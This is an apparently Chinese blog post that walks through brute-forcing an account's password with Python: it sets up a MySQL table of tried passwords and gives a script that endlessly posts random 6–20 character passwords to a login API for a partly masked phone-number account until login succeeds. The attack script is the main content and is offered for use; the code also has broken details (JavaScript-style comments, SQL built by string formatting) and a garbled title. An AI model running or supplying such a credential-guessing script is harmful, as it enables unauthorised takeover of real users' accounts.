一、首先在本地新建了一个数据库，保存已经试错过的密码

CREATE TABLE `test`.`pwd` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`passwod` varchar(20) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL DEFAULT ”,
`status` int(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`) USING BTREE,
UNIQUE INDEX `id`(`id`) USING BTREE,
INDEX `pwd`(`passwod`) USING BTREE
) ENGINE = MyISAM AUTO_INCREMENT = 1 CHARACTER SET = latin1 COLLATE = latin1_swedish_ci ROW_FORMAT = Dynamic;

不需要多，两个字段就好

给密码字段加个索引，方便数据量大的时候查询

二、写脚本

import requests
import random
import json
import pymysql

class login:
    def randomStr():
        s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
        salt = ''
        //根据规则随机生成6-20位的字符串
        i = random.randint(6,20)
        for i in range(i):
            salt += random.choice(s)
        return salt

url = "http://www.api.com/api/User/login"
pymysql.install_as_MySQLdb()
db = pymysql.connect("localhost", "root", "", "test")
cursor = db.cursor()
while(True):
    salt = login.randomStr()
    //查询数据库中有没有已经有这个新生成的密码，有的话，重新生成一个，没有就插入一条
    sql = "select * from pwd where passwod='%s'" % salt
    r = cursor.execute(sql)
    result = cursor.fetchone()
    if(result != None):
        salt = login.randomStr()
    data = {"account": "134********", "password": salt, "imei": ""}
    res = requests.post(url=url,json=data)
    insertSql = "insert into pwd(`passwod`) values('%s')" % (salt)
    print(insertSql)
    try:
        cursor.execute(insertSql)
        db.commit()
    except:
        db.rollback()
    json_str = json.loads(res.text)
    print("随机密码：",salt)
    print("Python 原始数据：", json_str)
    //登陆成功之后退出
    if(json_str.get('code') == 1):
        print("登陆成功")
        exit()
    print("JSON 对象：", json_str.get('data').get('msg'))

这样一个简单的脚本就写好了，自动跑去吧

使用Python暴力激活成功教程密码